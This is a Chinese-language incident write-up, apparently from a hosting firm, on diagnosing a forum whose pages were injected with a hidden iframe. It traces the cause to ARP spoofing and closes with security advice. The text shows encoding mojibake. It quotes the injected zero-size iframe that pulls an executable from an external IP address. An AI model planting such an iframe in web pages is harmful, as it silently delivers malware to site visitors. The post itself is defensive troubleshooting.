昨日接到某論壇的求助,論壇中被掛iframe木馬,當(dāng)訪問論壇時發(fā)現(xiàn)每個頁面的置頂有個iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動提示有木馬,系統(tǒng)會彈出一個載下h.exe的對話框。由于論壇是當(dāng)天剛出現(xiàn)的情況,服務(wù)器中就放置了一個論壇,分析有可能有以下幾種情況。
- 論壇被攻擊
- IIS被置入木馬
- ARP攻擊
針對第一種情況找到論壇中改過的文件與模板,并未發(fā)現(xiàn)相關(guān)被篡改的內(nèi)容,第一種情況排除。接下來接以下兩種思路來尋找解決方法,在論壇中新建兩個文件,一個是1.html、一個是1.php 無需輸入內(nèi)容。通過論壇網(wǎng)址訪問 網(wǎng)址/1.html 訪問此頁面沒發(fā)現(xiàn)異常、訪問1.php發(fā)現(xiàn)被自動掛馬,也就是說當(dāng)運行PHP的文件時會自動掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會出現(xiàn)以上的情況)按IIS的配置進行查找也未發(fā)現(xiàn)問題。
懷疑可能是服務(wù)器所在的局域網(wǎng)或網(wǎng)絡(luò)有ARP攻擊,從網(wǎng)上下載一個ARP防火墻后重啟服務(wù)器,發(fā)現(xiàn)問題解決,每個頁面中已經(jīng)沒有iframe的木馬。訪問論壇首頁和原建立的1.php頁面也已正常。但訪問論壇子頁時360仍提示有木馬,但子頁的代碼已無iframe的內(nèi)容。這種情況可能是論壇訪問過大,多用戶同時訪問子頁,360有云計算會將原有木馬的網(wǎng)站或頁面自動提交到云服務(wù)器中,以致及時清除木馬后360的云服務(wù)器還沒有反映過來才出現(xiàn)的誤報情況。
在些易天科技提示服務(wù)器管理員除作好站點的安全防范外,應(yīng)對服務(wù)器作相關(guān)的安全設(shè)置。安裝必要的軟件。